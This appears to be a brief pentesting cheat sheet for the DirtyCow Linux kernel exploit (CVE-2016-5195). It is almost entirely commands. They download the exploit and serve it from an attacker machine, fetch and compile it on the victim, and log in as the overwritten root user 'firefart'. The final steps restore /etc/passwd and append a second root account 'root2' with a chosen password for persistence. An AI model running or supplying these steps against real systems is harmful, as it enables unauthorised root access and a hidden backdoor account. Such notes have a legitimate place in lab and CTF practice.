DirtyCow (CVE-2016-5195)

Usage

Download & share the exploit

cd /home/kali/share
wget -O dirty.c https://www.exploit-db.com/download/40839
python3 -m http.server 80

On the victim

wget -O /tmp/dirty.c http://x.x.x.x/dirty.c

Optional, if stddef.h is not found (or other library), search for the file and add to PATH

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/src/linux-headers-2.6.31-14/include/linux
gcc -pthread dirty.c -o dirty -lcrypt
chmod u+x dirty
./dirty
[myprecious]
ssh firefart@$IP -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa
[myprecious]

Restore backup passwd file and add a second root user

mv /tmp/passwd.bak /etc/passwd
echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd
ssh root2@$IP -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa
[PreciouS]

Will be logged as “root” (not root2).